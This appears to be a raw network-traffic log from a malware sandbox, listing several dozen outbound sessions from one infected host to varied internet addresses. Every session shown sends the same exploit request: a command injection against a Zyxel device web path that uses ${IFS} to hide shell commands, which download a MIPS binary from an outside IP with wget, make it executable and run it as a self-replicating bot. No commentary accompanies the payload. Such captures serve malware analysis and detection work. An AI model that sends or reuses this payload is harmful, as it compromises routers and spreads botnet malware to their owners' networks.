                                      Jan 14, 2024 15:50:41.172444105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3025192.168.2.1448256138.120.213.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172504902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3026192.168.2.1449066187.204.76.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172553062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3027192.168.2.144283613.253.29.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172610044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3028192.168.2.1453170174.146.50.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172662020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3029192.168.2.1435252187.184.142.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172723055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3030192.168.2.14494641.254.87.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172780991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3031192.168.2.1436988211.230.18.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172842979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3032192.168.2.145773892.82.9.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172902107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3033192.168.2.145982477.6.30.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.172938108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3034192.168.2.1445750166.9.6.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173015118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3035192.168.2.144518425.61.122.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173070908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3036192.168.2.144045851.116.16.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173127890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3037192.168.2.1452364182.185.94.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173187971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3038192.168.2.1435064140.98.223.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173218012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3039192.168.2.1446382174.197.39.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173275948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3040192.168.2.1455128195.3.242.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173336983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3041192.168.2.1435632158.133.26.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173404932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3042192.168.2.1449820150.132.152.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173475981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3043192.168.2.144365074.24.94.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173528910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3044192.168.2.1442720161.201.91.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173582077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3045192.168.2.144044248.135.84.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173638105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3046192.168.2.145466046.207.93.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173686028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3047192.168.2.1451636132.196.230.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173744917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3048192.168.2.1448234149.102.172.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173794985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3049192.168.2.1442476154.128.198.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173819065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3050192.168.2.144364079.104.122.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173921108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3051192.168.2.1449610150.189.118.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.173974991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3052192.168.2.1449710114.87.244.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174050093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3053192.168.2.1447356154.183.63.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174103975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3054192.168.2.145905252.150.220.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174146891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3055192.168.2.1437156139.153.95.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174206018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3056192.168.2.1453930217.253.238.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174259901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3057192.168.2.1449566141.72.243.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174300909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3058192.168.2.1456174172.171.25.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174359083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3059192.168.2.144826452.240.225.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174410105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3060192.168.2.144293237.228.140.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174495935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3061192.168.2.1451026198.211.234.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174540997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3062192.168.2.143889866.140.209.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174596071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3063192.168.2.145235037.96.29.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174663067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3064192.168.2.1458738200.44.171.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174715042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3065192.168.2.1457626193.197.144.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174768925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3066192.168.2.144863297.204.59.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174823999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3067192.168.2.1436650160.175.233.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174865007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3068192.168.2.1455958185.217.85.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174916029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3069192.168.2.1444610130.220.238.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.174979925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3070192.168.2.1448282181.163.97.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175039053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3071192.168.2.1451876158.12.8.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175062895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3072192.168.2.144482880.24.168.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175132990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3073192.168.2.1447582172.78.193.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175210953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3074192.168.2.144821640.149.126.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175270081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3075192.168.2.1443662136.246.158.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175329924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3076192.168.2.144288091.201.168.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175391912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3077192.168.2.1437840194.218.208.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175419092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3078192.168.2.1456690168.78.195.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175460100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3079192.168.2.145924864.58.77.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175522089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3080192.168.2.144444644.184.156.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175590992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3081192.168.2.1441016198.45.110.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175642967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3082192.168.2.145106254.70.9.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175695896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3083192.168.2.1438486223.8.219.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175753117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3084192.168.2.1437612168.228.59.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175802946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3085192.168.2.144691663.37.35.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175848961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3086192.168.2.145148468.55.7.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.175906897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3087192.168.2.144524265.142.96.56443
                                      TimestampBytes transferredDirectionData
